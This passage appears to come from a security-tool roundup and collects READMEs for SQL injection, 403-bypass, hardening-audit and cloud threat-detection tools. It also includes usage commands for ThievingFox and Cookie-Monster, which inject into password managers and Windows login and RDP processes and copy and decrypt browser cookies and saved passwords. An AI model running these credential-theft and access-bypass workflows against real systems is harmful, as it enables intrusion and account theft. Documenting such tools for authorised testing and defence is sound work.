    schema_names = await ext.extract_schema_names(strategy='model')
    Example 2 - Extracting Tables
    tables = await ext.extract_table_names(strategy='model')
    Example 3 - Extracting Columns
    columns = await ext.extract_column_names(table='users', strategy='model')
    Example 4 - Extracting Tables and Columns Together
    metadata = await ext.extract_meta(strategy='model')

    Once you know the structure, you can extract the actual content.

    Example 1 - Extracting Generic Columns
    # text_strategy:    Use this strategy if the column is text
    res = await ext.extract_column(table='users', column='address', text_strategy='dynamic')
    Example 2 - Extracting Textual Columns
    # strategy:
    # 'binary': Use binary search
    # 'fivegram': Use five-gram model
    # 'unigram': Use unigram model
    # 'dynamic': Dynamically identify the best strategy. This setting
    # also enables opportunistic guessing.
    res = await ext.extract_column_text(table='users', column='address', strategy='dynamic')
    Example 3 - Extracting Integer Columns
    res = await ext.extract_column_int(table='users', column='id')
    Example 4 - Extracting Float Columns
    res = await ext.extract_column_float(table='products', column='price')
    Example 5 - Extracting Blob (Binary Data) Columns
    res = await ext.extract_column_blob(table='users', column='id')

    More examples can be found in the tests directory.

    Using Hakuin from the Command Line

    Hakuin comes with a simple wrapper tool, hk.py, that allows you to use Hakuin's basic functionality directly from the command line. To find out more, run:

    python3 hk.py -h

    For Researchers

    This repository is actively developed to fit the needs of security practitioners. Researchers looking to reproduce the experiments described in our paper should install the frozen version as it contains the original code, experiment scripts, and an instruction manual for reproducing the results.

    Cite Hakuin

    @inproceedings{hakuin_bsqli,
    title={Hakuin: Optimizing Blind SQL Injection with Probabilistic Language Models},
    author={Pru{\v{z}}inec, Jakub and Nguyen, Quynh Anh},
    booktitle={2023 IEEE Security and Privacy Workshops (SPW)},
    pages={384--393},
    year={2023},
    organization={IEEE}
    }


    BypassFuzzer - Fuzz 401/403/404 Pages For Bypasses

    By: Zion3R


    The original 403fuzzer.py :)

    Fuzz 401/403ing endpoints for bypasses

    This tool performs various checks via headers, path normalization, verbs, etc. to attempt to bypass ACLs or URL validation.

    It will output the response codes and length for each request, in a nicely organized, color-coded way so things are readable.

    I implemented a "Smart Filter" that lets you mute responses that look the same after a certain number of times.

    You can now feed it raw HTTP requests that you save to a file from Burp.

    Follow me on twitter! @intrudir


    Usage

    usage: bypassfuzzer.py -h

    Specifying a request to test

    Best method: Feed it a raw HTTP request from Burp!

    Simply paste the request into a file and run the script!
    • It will parse and use cookies & headers from the request.
    • Easiest way to authenticate for your requests.

    python3 bypassfuzzer.py -r request.txt
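    For illustration, parsing such a raw request file mostly means splitting the request line, the headers, and the body; a rough sketch of that idea (hypothetical code, not the tool's actual parser) could look like:

    def parse_raw_request(path):
        # Text mode converts the \r\n line endings of a saved Burp request to \n.
        with open(path, "r", encoding="utf-8", errors="replace") as f:
            raw = f.read()
        head, _, body = raw.partition("\n\n")
        lines = head.splitlines()
        method, target, _version = lines[0].split(" ", 2)
        headers = {}
        for line in lines[1:]:
            if ":" in line:
                name, value = line.split(":", 1)
                headers[name.strip()] = value.strip()
        return method, target, headers, body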

    Using other flags

    Specify a URL

    python3 bypassfuzzer.py -u http://example.com/test1/test2/test3/forbidden.html

    Specify cookies to use in requests:
    some examples:

    --cookies "cookie1=blah"
    -c "cookie1=blah; cookie2=blah"

    Specify a method/verb and body data to send

    bypassfuzzer.py -u https://example.com/forbidden -m POST -d "param1=blah&param2=blah2"
    bypassfuzzer.py -u https://example.com/forbidden -m PUT -d "param1=blah&param2=blah2"

    Specify custom headers to use with every request. Maybe you need to add some kind of auth header like Authorization: Bearer <token>.

    Specify -H "header: value" for each additional header you'd like to add:

    bypassfuzzer.py -u https://example.com/forbidden -H "Some-Header: blah" -H "Authorization: Bearer 1234567"

    Smart filter feature!

    Based on response code and length. If it sees a response 8 times or more, it will automatically mute it.

    Repeats are changeable in the code until I add an option to specify it in a flag.

    NOTE: Can't be used simultaneously with -hc or -hl (yet)

    # toggle smart filter on
    bypassfuzzer.py -u https://example.com/forbidden --smart
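    Conceptually, the smart filter just counts (status code, response length) pairs and mutes a pair once it has been seen a set number of times; a minimal sketch of that idea (not the tool's implementation) is:

    from collections import Counter

    class SmartFilter:
        # Mute responses whose (status, length) signature keeps repeating.
        def __init__(self, threshold=8):
            self.threshold = threshold
            self.seen = Counter()

        def should_report(self, status_code, content_length):
            sig = (status_code, content_length)
            self.seen[sig] += 1
            return self.seen[sig] < self.threshold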

    Specify a proxy to use

    Useful if you wanna proxy through Burp

    bypassfuzzer.py -u https://example.com/forbidden --proxy http://127.0.0.1:8080

    Skip sending header payloads or url payloads

    # skip sending headers payloads
    bypassfuzzer.py -u https://example.com/forbidden -sh
    bypassfuzzer.py -u https://example.com/forbidden --skip-headers

    # Skip sending path normalization payloads
    bypassfuzzer.py -u https://example.com/forbidden -su
    bypassfuzzer.py -u https://example.com/forbidden --skip-urls

    Hide response code/length

    Provide comma delimited lists without spaces. Examples:

    # Hide response codes
    bypassfuzzer.py -u https://example.com/forbidden -hc 403,404,400

    # Hide response lengths of 638
    bypassfuzzer.py -u https://example.com/forbidden -hl 638

    TODO

    • [x] Automatically check other methods/verbs for bypass
    • [x] absolute domain attack
    • [ ] Add HTTP/2 support
    • [ ] Looking for ideas. Ping me on twitter! @intrudir


    SQLMC - Check All Urls Of A Domain For SQL Injections

    By: Zion3R


    SQLMC (SQL Injection Massive Checker) is a tool designed to scan a domain for SQL injection vulnerabilities. It crawls the given URL up to a specified depth, checks each link for SQL injection vulnerabilities, and reports its findings.
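    A breadth-first crawl up to a fixed depth is the core of that workflow; a simplified sketch (hypothetical code, not SQLMC itself) that only collects same-host links could look like the following, with each collected URL then handed to the injection checks:

    from urllib.parse import urljoin, urlparse

    import requests
    from bs4 import BeautifulSoup

    def crawl(start_url, max_depth):
        # Collect same-host links breadth-first, up to max_depth levels deep.
        seen, frontier = {start_url}, [start_url]
        host = urlparse(start_url).netloc
        for _ in range(max_depth):
            next_frontier = []
            for url in frontier:
                try:
                    resp = requests.get(url, timeout=10)
                except requests.RequestException:
                    continue
                soup = BeautifulSoup(resp.text, "html.parser")
                for a in soup.find_all("a", href=True):
                    link = urljoin(url, a["href"])
                    if urlparse(link).netloc == host and link not in seen:
                        seen.add(link)
                        next_frontier.append(link)
            frontier = next_frontier
        return seen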

    Features

    • Scans a domain for SQL injection vulnerabilities
    • Crawls the given URL up to a specified depth
    • Checks each link for SQL injection vulnerabilities
    • Reports vulnerabilities along with server information and depth

    Installation

    1. Install the required dependencies:

    pip3 install sqlmc

    Usage

    Run sqlmc with the following command-line arguments:

    • -u, --url: The URL to scan (required)
    • -d, --depth: The depth to scan (required)
    • -o, --output: The output file to save the results

    Example usage:

    sqlmc -u http://example.com -d 2

    Replace http://example.com with the URL you want to scan and 2 with the desired depth of the scan. You can also specify an output file using the -o or --output flag followed by the desired filename.

    The tool will then perform the scan and display the results.

    ToDo

    • Check for multiple GET params
    • Better injection checker trigger methods

    Credits

    License

    This project is licensed under the GNU Affero General Public License v3.0.



    HardeningMeter - Open-Source Python Tool Carefully Designed To Comprehensively Assess The Security Hardening Of Binaries And Systems

    By: Zion3R


    HardeningMeter is an open-source Python tool carefully designed to comprehensively assess the security hardening of binaries and systems. Its robust capabilities include thorough checks of various binary exploitation protection mechanisms, including Stack Canary, RELRO, randomizations (ASLR, PIC, PIE), None Exec Stack, Fortify, ASAN, and the NX bit. This tool is suitable for all types of binaries and provides accurate information about the hardening status of each binary, identifying those that deserve attention and those with robust security measures. HardeningMeter supports all Linux distributions and machine-readable output; the results can be printed to the screen in a table format or exported to a CSV file. (For more information see the Documentation.md file.)
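    To give a flavour of what such checks look like (this is an illustrative sketch built on parsing readelf output, not HardeningMeter's own code), the NX bit, stack canary and full RELRO status of a binary can be read from its program headers, symbols and dynamic section:

    import subprocess

    def readelf(flag, path):
        # Thin wrapper around the readelf command that HardeningMeter also relies on.
        return subprocess.run(["readelf", flag, path], capture_output=True, text=True).stdout

    def quick_checks(path):
        prog_headers = readelf("-lW", path)
        symbols = readelf("-sW", path)
        dynamic = readelf("-dW", path)
        # NX: the GNU_STACK segment must not carry the executable ("E") flag.
        nx = any("GNU_STACK" in line and "E" not in line.split()[-2]
                 for line in prog_headers.splitlines())
        # Stack canary: binaries built with -fstack-protector reference __stack_chk_fail.
        canary = "__stack_chk_fail" in symbols
        # Full RELRO: a GNU_RELRO segment combined with the BIND_NOW dynamic flag.
        relro = "GNU_RELRO" in prog_headers and "BIND_NOW" in dynamic
        return {"NX": nx, "Stack Canary": canary, "Full RELRO": relro}

    print(quick_checks("/bin/cp"))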


    Execute Scanning Example

    For example, scan the '/bin/cp' file and the system hardening status:

    python3 HardeningMeter.py -f /bin/cp -s

    Installation Requirements

    Before installing HardeningMeter, make sure your machine has the following:

    1. The readelf and file commands
    2. Python version 3
    3. pip
    4. tabulate

    pip install tabulate

    Install HardeningMeter

    The very latest developments can be obtained via git.

    Clone or download the project files (no compilation nor installation is required)

    git clone https://github.com/OfriOuzan/HardeningMeter

    Arguments

    -f --file

    Specify the files you want to scan; the argument can take more than one file, separated by spaces.

    -d --directory

    Specify the directory you want to scan; the argument takes one directory and scans all ELF files in it recursively.

    -e --external

    Specify whether you want to add external checks (False by default).

    -m --show_missing

    Prints, in order, only those files that are missing security hardening mechanisms and need extra attention.

    -s --system

    Specify if you want to scan the system hardening methods.

    -c --csv_format

    Specify if you want to save the results to csv file (results are printed as a table to stdout by default).

    Results

    HardeningMeter's results are printed as a table and consist of 3 different states:

    • (X) - indicates that the binary hardening mechanism is disabled.
    • (V) - indicates that the binary hardening mechanism is enabled.
    • (-) - indicates that the binary hardening mechanism is not relevant in this particular case.

    Notes

    When the default language on Linux is not English, make sure to add "LC_ALL=C" before calling the script.



    ThievingFox - Remotely Retrieving Credentials From Password Managers And Windows Utilities

    By: Zion3R


    ThievingFox is a collection of post-exploitation tools to gather credentials from various password managers and Windows utilities. Each module leverages a specific method of injecting into the target process, and then hooks internal functions to gather credentials.

    The accompanying blog post can be found here


    Installation

    Linux

    Rustup must be installed, follow the instructions available here : https://rustup.rs/

    The mingw-w64 package must be installed. On Debian, this can be done using :

    apt install mingw-w64

    Both x86 and x86_64 windows targets must be installed for Rust:

    rustup target add x86_64-pc-windows-gnu
    rustup target add i686-pc-windows-gnu

    Mono and Nuget must also be installed, instructions are available here : https://www.mono-project.com/download/stable/#download-lin

    After adding Mono repositories, Nuget can be installed using apt :

    apt install nuget

    Finally, Python dependencies must be installed:

    pip install -r client/requirements.txt

    ThievingFox works with python >= 3.11.

    Windows

    Rustup must be installed, follow the instructions available here : https://rustup.rs/

    Both x86 and x86_64 windows targets must be installed for Rust:

    rustup target add x86_64-pc-windows-msvc
    rustup target add i686-pc-windows-msvc

    .NET development environment must also be installed. From Visual Studio, navigate to Tools > Get Tools And Features > Install ".NET desktop development"

    Finally, Python dependencies must be installed:

    pip install -r client/requirements.txt

    ThievingFox works with python >= 3.11

    NOTE: On a Windows host, in order to use the KeePass module, msbuild must be available in the PATH. This can be achieved by running the client from within a Visual Studio Developer PowerShell (Tools > Command Line > Developer PowerShell).

    Targets

    All modules have been tested on the following Windows versions :

    Windows Version
    Windows Server 2022
    Windows Server 2019
    Windows Server 2016
    Windows Server 2012R2
    Windows 10
    Windows 11

    [!CAUTION] Modules have not been tested on other versions, and are expected not to work.

    Application: Injection Method
    KeePass.exe: AppDomainManager Injection
    KeePassXC.exe: DLL Proxying
    LogonUI.exe (Windows Login Screen): COM Hijacking
    consent.exe (Windows UAC Popup): COM Hijacking
    mstsc.exe (Windows default RDP client): COM Hijacking
    RDCMan.exe (Sysinternals' RDP client): COM Hijacking
    MobaXTerm.exe (3rd party RDP client): COM Hijacking

    Usage

    [!CAUTION] Although I tried to ensure that these tools do not impact the stability of the targeted applications, inline hooking and library injection are unsafe and this might result in a crash, or the application being unstable. If that were the case, using the cleanup module on the target should be enough to ensure that the next time the application is launched, no injection/hooking is performed.

    ThievingFox contains 3 main modules : poison, cleanup and collect.

    Poison

    For each application specified in the command line parameters, the poison module retrieves the original library that is going to be hijacked (for COM hijacking and DLL proxying), compiles a library that matches the properties of the original DLL, uploads it to the server, and modifies the registry if needed to perform COM hijacking.

    To speed up the process of compilation of all libraries, a cache is maintained in client/cache/.

    --mstsc, --rdcman, and --mobaxterm have a specific option, respectively --mstsc-poison-hkcr, --rdcman-poison-hkcr, and --mobaxterm-poison-hkcr. If one of these options is specified, the COM hijacking will replace the registry key in the HKCR hive, meaning all users will be impacted. By default, only currently logged-in users are impacted (all users that have an HKCU hive).

    --keepass and --keepassxc have specific options, --keepass-path, --keepass-share, and --keepassxc-path, --keepassxc-share, to specify where these applications are installed, if it's not the default installation path. This is not required for other applications, since COM hijacking is used.

    The KeePass module requires the Visual C++ Redistributable to be installed on the target.

    Multiple applications can be specified at once, or, the --all flag can be used to target all applications.

    [!IMPORTANT] Remember to clean the cache if you ever change the --tempdir parameter, since the directory name is embedded inside native DLLs.

    $ python3 client/ThievingFox.py poison -h
    usage: ThievingFox.py poison [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepass-path KEEPASS_PATH]
    [--keepass-share KEEPASS_SHARE] [--keepassxc] [--keepassxc-path KEEPASSXC_PATH] [--keepassxc-share KEEPASSXC_SHARE] [--mstsc] [--mstsc-poison-hkcr]
    [--consent] [--logonui] [--rdcman] [--rdcman-poison-hkcr] [--mobaxterm] [--mobaxterm-poison-hkcr] [--all]
    target

    positional arguments:
    target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]

    options:
    -h, --help show this help message and exit
    -hashes HASHES, --hashes HASHES
    LM:NT hash
    -aesKey AESKEY, --aesKey AESKEY
    AES key to use for Kerberos Authentication
    -k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
    -dc-ip DC_IP, --dc-ip DC_IP
    IP Address of the domain controller
    -no-pass, --no-pass Do not prompt for password
    --tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
    --keepass Try to poison KeePass.exe
    --keepass-path KEEPASS_PATH
    The path where KeePass is installed, without the share name (Default: /Program Files/KeePass Password Safe 2/)
    --keepass-share KEEPASS_SHARE
    The share on which KeePass is installed (Default: c$)
    --keepassxc Try to poison KeePassXC.exe
    --keepassxc-path KEEPASSXC_PATH
    The path where KeePassXC is installed, without the share name (Default: /Program Files/KeePassXC/)
    --keepassxc-share KEEPASSXC_SHARE
    The share on which KeePassXC is installed (Default: c$)
    --mstsc Try to poison mstsc.exe
    --mstsc-poison-hkcr Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for mstsc, which will also work for user that are currently not
    logged in (Default: False)
    --consent Try to poison Consent.exe
    --logonui Try to poison LogonUI.exe
    --rdcman Try to poison RDCMan.exe
    --rdcman-poison-hkcr Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for RDCMan, which will also work for user that are currently not
    logged in (Default: False)
    --mobaxterm Try to poison MobaXTerm.exe
    --mobaxterm-poison-hkcr
    Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for MobaXTerm, which will also work for user that are currently not
    logged in (Default: False)
    --all Try to poison all applications

    Cleanup

    For each application specified in the command line parameters, the cleanup module first removes the poisoning artifacts that force the target application to load the hooking library. Then, it tries to delete the libraries that were uploaded to the remote host.

    For applications that support poisoning of both the HKCU and HKCR hives, both are cleaned up regardless.

    Multiple applications can be specified at once, or, the --all flag can be used to cleanup all applications.

    It does not clean extracted credentials on the remote host.

    [!IMPORTANT] If the targeted application is in use while the cleanup module is run, the DLLs that were dropped on the target cannot be deleted. Nonetheless, the cleanup module will revert the configuration that enables the injection, which should ensure that the next time the application is launched, no injection is performed. Files that cannot be deleted by ThievingFox are logged.

    $ python3 client/ThievingFox.py cleanup -h
    usage: ThievingFox.py cleanup [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepass-share KEEPASS_SHARE]
    [--keepass-path KEEPASS_PATH] [--keepassxc] [--keepassxc-path KEEPASSXC_PATH] [--keepassxc-share KEEPASSXC_SHARE] [--mstsc] [--consent] [--logonui]
    [--rdcman] [--mobaxterm] [--all]
    target

    positional arguments:
    target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]

    options:
    -h, --help show this help message and exit
    -hashes HASHES, --hashes HASHES
    LM:NT hash
    -aesKey AESKEY, --aesKey AESKEY
    AES key to use for Kerberos Authentication
    -k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
    -dc-ip DC_IP, --dc-ip DC_IP
    IP Address of the domain controller
    -no-pass, --no-pass Do not prompt for password
    --tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
    --keepass Try to cleanup all poisonning artifacts related to KeePass.exe
    --keepass-share KEEPASS_SHARE
    The share on which KeePass is installed (Default: c$)
    --keepass-path KEEPASS_PATH
    The path where KeePass is installed, without the share name (Default: /Program Files/KeePass Password Safe 2/)
--keepassxc Try to cleanup all poisoning artifacts related to KeePassXC.exe
    --keepassxc-path KEEPASSXC_PATH
    The path where KeePassXC is installed, without the share name (Default: /Program Files/KeePassXC/)
    --keepassxc-share KEEPASSXC_SHARE
    The share on which KeePassXC is installed (Default: c$)
--mstsc Try to cleanup all poisoning artifacts related to mstsc.exe
--consent Try to cleanup all poisoning artifacts related to Consent.exe
--logonui Try to cleanup all poisoning artifacts related to LogonUI.exe
--rdcman Try to cleanup all poisoning artifacts related to RDCMan.exe
--mobaxterm Try to cleanup all poisoning artifacts related to MobaXTerm.exe
--all Try to cleanup all poisoning artifacts related to all applications

    Collect

For each application specified in the command line parameters, the collect module retrieves the output files stored on the remote host inside C:\Windows\Temp\<tempdir> corresponding to the application, and decrypts them. The files are deleted from the remote host, and the retrieved data is stored in client/output/.

Multiple applications can be specified at once, or the --all flag can be used to collect logs from all applications.

    $ python3 client/ThievingFox.py collect -h
    usage: ThievingFox.py collect [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepassxc] [--mstsc] [--consent]
    [--logonui] [--rdcman] [--mobaxterm] [--all]
    target

    positional arguments:
    target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]

    options:
    -h, --help show this help message and exit
    -hashes HASHES, --hashes HASHES
    LM:NT hash
    -aesKey AESKEY, --aesKey AESKEY
    AES key to use for Kerberos Authentication
    -k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
    -dc-ip DC_IP, --dc-ip DC_IP
IP Address of the domain controller
    -no-pass, --no-pass Do not prompt for password
    --tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
    --keepass Collect KeePass.exe logs
    --keepassxc Collect KeePassXC.exe logs
    --mstsc Collect mstsc.exe logs
    --consent Collect Consent.exe logs
    --logonui Collect LogonUI.exe logs
    --rdcman Collect RDCMan.exe logs
    --mobaxterm Collect MobaXTerm.exe logs
    --all Collect logs from all applications


HackerInfo - Information on Web Application Security

    By: Zion3R




Information on Web Application Security


Install:

    sudo apt install python3 python3-pip

    pip3 install termcolor

    pip3 install google

    pip3 install optioncomplete

    pip3 install bs4


    pip3 install prettytable

    git clone https://github.com/Matrix07ksa/HackerInfo/

    cd HackerInfo

    chmod +x HackerInfo

    ./HackerInfo -h



    python3 HackerInfo.py -d www.facebook.com -f pdf
    [+] <-- Running Domain_filter_File ....-->
    [+] <-- Searching [www.facebook.com] Files [pdf] ....-->
    https://www.facebook.com/gms_hub/share/dcvsda_wf.pdf
    https://www.facebook.com/gms_hub/share/facebook_groups_for_pages.pdf
    https://www.facebook.com/gms_hub/share/videorequirementschart.pdf
    https://www.facebook.com/gms_hub/share/fundraise-on-facebook_hi_in.pdf
    https://www.facebook.com/gms_hub/share/bidding-strategy_decision-tree_en_us.pdf
    https://www.facebook.com/gms_hub/share/fundraise-on-facebook_es_la.pdf
    https://www.facebook.com/gms_hub/share/fundraise-on-facebook_ar.pdf
    https://www.facebook.com/gms_hub/share/fundraise-on-facebook_ur_pk.pdf
    https://www.facebook.com/gms_hub/share/fundraise-on-facebook_cs_cz.pdf
    https://www.facebook.com/gms_hub/share/fundraise-on-facebook_it_it.pdf
    https://www.facebook.com/gms_hub/share/fundraise-on-facebook_pl_pl.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_nl.pdf
    https://www.facebook.com/gms_hub/share/fundraise-on-facebook_pt_br.pdf
    https://www.facebook.com/gms_hub/share/creative-best-practices_id_id.pdf
    https://www.facebook.com/gms_hub/share/creative-best-practices_fr_fr.pdf
    https://www.facebook.com/gms_hub/share/fundraise-on-facebook_tr_tr.pdf
    https://www.facebook.com/gms_hub/share/creative-best-practices_hi_in.pdf
    https://www.facebook.com/rsrc.php/yA/r/AVye1Rrg376.pdf
    https://www.facebook.com/gms_hub/share/creative-best-practices_ur_pk.pdf
    https://www.facebook.com/gms_hub/share/creative-best-practices_nl_nl.pdf
    https://www.facebook.com/gms_hub/share/creative-best-practices_de_de.pdf
    https://www.facebook.com/gms_hub/share/fundraise-on-facebook_de_de.pdf
    https://www.facebook.com/gms_hub/share/creative-best-practices_cs_cz.pdf
    https://www.facebook.com/gms_hub/share/fundraise-on-facebook_sk_sk.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_japanese_jp.pdf
    #####################[Finshid]########################

    Usage:

HackerInfo - Information on Web Application Security (11)

Install the hackinfo library:

    sudo python setup.py install
    pip3 install hackinfo



    Cookie-Monster - BOF To Steal Browser Cookies & Credentials

    By: Zion3R


Steal browser cookies for Edge, Chrome, and Firefox through a BOF or exe! Cookie-Monster will extract the WebKit master key, locate a browser process with a handle to the Cookies and Login Data files, copy the handle(s) and then filelessly download the target files. Once the Cookies/Login Data file(s) are downloaded, the Python decryption script can help extract those secrets! The Firefox module will parse profiles.ini, locate the logins.json and key4.db files, and download them. A separate GitHub repo is referenced for offline decryption.


    BOF Usage

    Usage: cookie-monster [ --chrome || --edge || --firefox || --chromeCookiePID <pid> || --chromeLoginDataPID <PID> || --edgeCookiePID <pid> || --edgeLoginDataPID <pid>] 
    cookie-monster Example:
    cookie-monster --chrome
    cookie-monster --edge
cookie-monster --firefox
    cookie-monster --chromeCookiePID 1337
    cookie-monster --chromeLoginDataPID 1337
    cookie-monster --edgeCookiePID 4444
    cookie-monster --edgeLoginDataPID 4444
    cookie-monster Options:
    --chrome, looks at all running processes and handles, if one matches chrome.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD
    --edge, looks at all running processes and handles, if one matches msedge.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD
    --firefox, looks for profiles.ini and locates the key4.db and logins.json file
--chromeCookiePID, if a chrome.exe PID with a handle to the Cookies file is known, specify the PID to duplicate its handle and copy the file
--chromeLoginDataPID, if a chrome.exe PID with a handle to the Login Data file is known, specify the PID to duplicate its handle and copy the file
--edgeCookiePID, if an msedge.exe PID with a handle to the Cookies file is known, specify the PID to duplicate its handle and copy the file
--edgeLoginDataPID, if an msedge.exe PID with a handle to the Login Data file is known, specify the PID to duplicate its handle and copy the file

    EXE usage

    Cookie Monster Example:
    cookie-monster.exe --all
    Cookie Monster Options:
    -h, --help Show this help message and exit
    --all Run chrome, edge, and firefox methods
    --edge Extract edge keys and download Cookies/Login Data file to PWD
    --chrome Extract chrome keys and download Cookies/Login Data file to PWD
    --firefox Locate firefox key and Cookies, does not make a copy of either file

    Decryption Steps

    Install requirements

    pip3 install -r requirements.txt

Base64-encode the WebKit master key

    python3 base64-encode.py "\xec\xfc...."
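
For reference, the encoding step itself is simple; here is a minimal Python sketch of the idea (illustrative only, not the project's base64-encode.py; the escaped key string is a placeholder):

import base64
import sys

# Illustrative only: interpret a "\xec\xfc..."-style escaped string from the
# command line as raw bytes, then print its Base64 form for use with decrypt.py.
escaped = sys.argv[1]
raw = escaped.encode("utf-8").decode("unicode_escape").encode("latin-1")
print(base64.b64encode(raw).decode())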

    Decrypt Chrome/Edge Cookies File

    python .\decrypt.py "XHh..." --cookies ChromeCookie.db

    Results Example:
    -----------------------------------
    Host: .github.com
    Path: /
    Name: dotcom_user
    Cookie: KingOfTheNOPs
    Expires: Oct 28 2024 21:25:22

    Host: github.com
    Path: /
    Name: user_session
    Cookie: x123.....
    Expires: Nov 11 2023 21:25:22

Decrypt Chrome/Edge Passwords File

    python .\decrypt.py "XHh..." --passwords ChromePasswords.db

    Results Example:
    -----------------------------------
    URL: https://test.com/
    Username: tester
    Password: McTesty

    Decrypt Firefox Cookies and Stored Credentials:
    https://github.com/lclevy/firepwd

    Installation

Ensure Mingw-w64 and make are installed on Linux prior to compiling.

    make

To compile the exe on Windows:

    gcc .\cookie-monster.c -o cookie-monster.exe -lshlwapi -lcrypt32

    TO-DO

• Update decrypt.py to support Firefox (based on firepwd) and add a bruteforce module based on DonPAPI

    References

    This project could not have been done without the help of Mr-Un1k0d3r and his amazing seasonal videos! Highly recommend checking out his lessons!!!
    Cookie Webkit Master Key Extractor: https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF
    Fileless download: https://github.com/fortra/nanodump
    Decrypt Cookies and Login Data: https://github.com/login-securite/DonPAPI



    Python's PyPI Reveals Its Secrets

GitGuardian is famous for its annual State of Secrets Sprawl report. In their 2023 report, they found over 10 million passwords, API keys, and other credentials exposed in public GitHub commits. The takeaways in their 2024 report did not just highlight 12.8 million new exposed secrets in GitHub, but a number in the popular Python package repository PyPI. PyPI,

    CloudGrappler - A purpose-built tool designed for effortless querying of high-fidelity and single-event detections related to well-known threat actors in popular cloud environments such as AWS and Azure

    By: Zion3R


    Permiso: https://permiso.io
    Read our release blog: https://permiso.io/blog/cloudgrappler-a-powerful-open-source-threat-detection-tool-for-cloud-environments

    CloudGrappler is a purpose-built tool designed for effortless querying of high-fidelity and single-event detections related to well-known threat actors in popular cloud environments such as AWS and Azure.


    Notes

To get the best results from CloudGrappler, we recommend using shorter time ranges when querying: this speeds up retrieval and keeps queries efficient.

    Required Packages

pip3 install -r requirements.txt

    Cloning cloudgrep locally

    To clone the cloudgrep repository locally, run the clone.sh file. Alternatively, you can manually clone the repository into the same directory where CloudGrappler was cloned.

chmod +x clone.sh
./clone.sh

    Input

    This tool offers a CLI (Command Line Interface). As such, here we review its use:

    Example 1 - Running the tool with default queries file

    Define the scanning scope inside data_sources.json file based on your cloud infrastructure configuration. The following example showcases a structured data_sources.json file for both AWS and Azure environments:

    Note

    Modifying the source inside the queries.json file to a wildcard character (*) will scan the corresponding query across both AWS and Azure environments.

{
    "AWS": [
        {
            "bucket": "cloudtrail-logs-00000000-ffffff",
            "prefix": [
                "testTrails/AWSLogs/00000000/CloudTrail/eu-east-1/2024/03/03",
                "testTrails/AWSLogs/00000000/CloudTrail/us-west-1/2024/03/04"
            ]
        },
        {
            "bucket": "aws-kosova-us-east-1-00000000"
        }
    ],
    "AZURE": [
        {
            "accountname": "logs",
            "container": [
                "cloudgrappler"
            ]
        }
    ]
}

    Run command

    python3 main.py

    Example 2 - Permiso Intel Use Case

    python3 main.py -p

    [+] Running GetFileDownloadUrls.*secrets_ for AWS 
    [+] Threat Actor: LUCR3
    [+] Severity: MEDIUM
[+] Description: Review use of CloudShell. Permiso seldom witnesses use of CloudShell outside of known attackers. This, however, may be a part of your normal business use case.

    Example 3 - Generate report

    python3 main.py -p -jo

reports
└── json
    β”œβ”€β”€ AWS
    β”‚   └── 2024-03-04 01:01 AM
    β”‚       └── cloudtrail-logs-00000000-ffffff--
    β”‚           └── testTrails/AWSLogs/00000000/CloudTrail/eu-east-1/2024/03/03
    β”‚               └── GetFileDownloadUrls.*secrets_.json
    └── AZURE
        └── 2024-03-04 01:01 AM
            └── logs
                └── cloudgrappler
                    └── okta_key.json

    Example 4 - Filtering logs based on date or time

    python3 main.py -p -sd 2024-02-15 -ed 2024-02-16

    Example 5 - Manually adding queries and data source types

    python3 main.py -q "GetFileDownloadUrls.*secret", "UpdateAccessKey" -s '*'

    Example 6 - Running the tool with your own queries file

    python3 main.py -f new_file.json

    Running in your Cloud and Authentication cloudgrep

    AWS

    Your system will need access to the S3 bucket. For example, if you are running on your laptop, you will need to configure the AWS CLI. If you are running on an EC2, an Instance Profile is likely the best choice.

    If you run on an EC2 instance in the same region as the S3 bucket with a VPC endpoint for S3 you can avoid egress charges. You can authenticate in a number of ways.
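
As a quick sanity check before running any queries (a generic snippet, not part of CloudGrappler or cloudgrep), you can confirm that credentials are picked up by the default AWS credential chain with boto3:

import boto3

# Verify that AWS credentials are available (environment variables, AWS CLI
# profile, or an EC2 Instance Profile) before querying S3 buckets.
identity = boto3.client("sts").get_caller_identity()
print("Authenticated as:", identity["Arn"])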

    Azure

    The simplest way to authenticate with Azure is to first run:

    az login

This will open a browser window and prompt you to log in to Azure.



    Attackgen - Cybersecurity Incident Response Testing Tool That Leverages The Power Of Large Language Models And The Comprehensive MITRE ATT&CK Framework

    By: Zion3R


    AttackGen is a cybersecurity incident response testing tool that leverages the power of large language models and the comprehensive MITRE ATT&CK framework. The tool generates tailored incident response scenarios based on user-selected threat actor groups and your organisation's details.


    Star the Repo

    If you find AttackGen useful, please consider starring the repository on GitHub. This helps more people discover the tool. Your support is greatly appreciated! ⭐

    Features

    • Generates unique incident response scenarios based on chosen threat actor groups.
    • Allows you to specify your organisation's size and industry for a tailored scenario.
    • Displays a detailed list of techniques used by the selected threat actor group as per the MITRE ATT&CK framework.
    • Create custom scenarios based on a selection of ATT&CK techniques.
    • Capture user feedback on the quality of the generated scenarios.
    • Downloadable scenarios in Markdown format.
